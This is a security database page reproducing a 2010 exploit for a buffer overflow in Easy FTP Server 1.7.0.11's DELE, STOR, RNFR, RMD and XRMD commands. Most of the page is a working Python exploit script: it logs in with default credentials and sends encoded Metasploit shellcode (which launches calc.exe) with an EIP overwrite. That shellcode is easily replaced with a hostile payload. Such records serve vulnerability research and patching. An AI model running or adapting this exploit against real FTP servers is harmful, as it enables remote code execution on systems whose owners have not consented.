Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:24545
HistoryAug 17, 2010 - 12:00 a.m.

Easy FTP Server v1.7.0.11 DELE, STOR, RNFR, RMD, XRMD Command Buffer Overflow

2010-08-1700:00:00
vulners.com
36
JSON

Exploit Title: Easy FTP Server v1.7.0.11 Multiple Command Buffer Overflow

Date: August 12, 2010

Author: Glafkos Charalambous

Software Link:

http://easyftpsvr.googlecode.com/files/easyftp-server-1.7.0.11-en.zip

Version: 1.7.0.11

Tested on: Windows XP SP3 En

Vulnerable Commands: DELE, STOR, RNFR, RMD, XRMD

import socket
import sys

if len(sys.argv) != 4:
print "Usage: ./easyftp.py <Target IP> <Port> <Command>"
print "Vulnerable Commands: DELE, STOR, RNFR, RMD, XRMD"
sys.exit(1)

target = sys.argv[1]
port = int(sys.argv[2])
command = sys.argv[3]

buffersize = 268

windows/exec - 227 bytes

http://www.metasploit.com

Encoder: x86/shikata_ga_nai

EXITFUNC=process, CMD=calc.exe

shellcode = ("\xd9\xec\xba\x4c\x61\x82\xbc\xd9\x74\x24\xf4\x33\xc9\xb1\x33"
"\x58\x31\x50\x17\x83\xe8\xfc\x03\x1c\x72\x60\x49\x60\x9c\xed"
"\xb2\x98\x5d\x8e\x3b\x7d\x6c\x9c\x58\xf6\xdd\x10\x2a\x5a\xee"
"\xdb\x7e\x4e\x65\xa9\x56\x61\xce\x04\x81\x4c\xcf\xa8\x0d\x02"
"\x13\xaa\xf1\x58\x40\x0c\xcb\x93\x95\x4d\x0c\xc9\x56\x1f\xc5"
"\x86\xc5\xb0\x62\xda\xd5\xb1\xa4\x51\x65\xca\xc1\xa5\x12\x60"
"\xcb\xf5\x8b\xff\x83\xed\xa0\x58\x34\x0c\x64\xbb\x08\x47\x01"
"\x08\xfa\x56\xc3\x40\x03\x69\x2b\x0e\x3a\x46\xa6\x4e\x7a\x60"
"\x59\x25\x70\x93\xe4\x3e\x43\xee\x32\xca\x56\x48\xb0\x6c\xb3"
"\x69\x15\xea\x30\x65\xd2\x78\x1e\x69\xe5\xad\x14\x95\x6e\x50"
"\xfb\x1c\x34\x77\xdf\x45\xee\x16\x46\x23\x41\x26\x98\x8b\x3e"
"\x82\xd2\x39\x2a\xb4\xb8\x57\xad\x34\xc7\x1e\xad\x46\xc8\x30"
"\xc6\x77\x43\xdf\x91\x87\x86\xa4\x6e\xc2\x8b\x8c\xe6\x8b\x59"
"\x8d\x6a\x2c\xb4\xd1\x92\xaf\x3d\xa9\x60\xaf\x37\xac\x2d\x77"
"\xab\xdc\x3e\x12\xcb\x73\x3e\x37\xa8\x12\xac\xdb\x01\xb1\x54"
"\x79\x5e")

eip = "\x91\xC8\x41\x7E"
nopsled = "\x90" * 16
junk = "\x90" * (buffersize-(len(nopsled)+len(shellcode)))
payload = nopsled+shellcode+junk+eip

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
connect = s.connect((target, port))
print "[+] Connected"
except:
print "[!] Connection Failed"
sys.exit(0)
s.recv(1024)

s.send('User ftp\r\n')
s.recv(1024)
s.send('PASS ftp\r\n')
s.recv(1024)
print "[+] Sending payload…"
s.send(command +' '+payload+'\r\n')
s.close()

Regards,
Glafkos Charalambous

JSON